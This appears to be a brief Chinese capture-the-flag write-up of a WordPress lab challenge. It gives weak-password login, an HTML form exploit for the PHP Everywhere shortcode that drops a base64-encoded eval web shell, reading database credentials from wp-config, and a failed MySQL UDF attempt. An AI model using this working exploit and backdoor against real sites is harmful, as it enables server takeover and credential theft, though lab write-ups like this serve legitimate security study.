1、弱口令爆破账号和密码得用户名test,密码test
2、登陆后找到html exp
<form action="http://eci-2ze2ffbnk8htycqm6o4r.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php" method="post">
<input name="action" value="parse-media-shortcode"/>
<textarea name="shortcode">[php_everywhere]<?php file_put_contents("/var/www/html/fuck.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2FiY2QnXSk7ID8+")); ?>[/php_everywhere]</textarea>
<input type="submit" value="Execute"/>
</form>
上传木马执行
连接后门fuck.php,在目录下找到了wp-config,里面有高权限数据库密码,使用蚁剑数据管理直接连
起初以为是跟D3ctf的worldpress题http://www.yongsheng.site/2022/03/29/d3ctf/
打mysql udf的时候发现没有写入插件的权限
show variables like '%secure%';
不能写入
淦
flag在根目录下,还是直接查看得了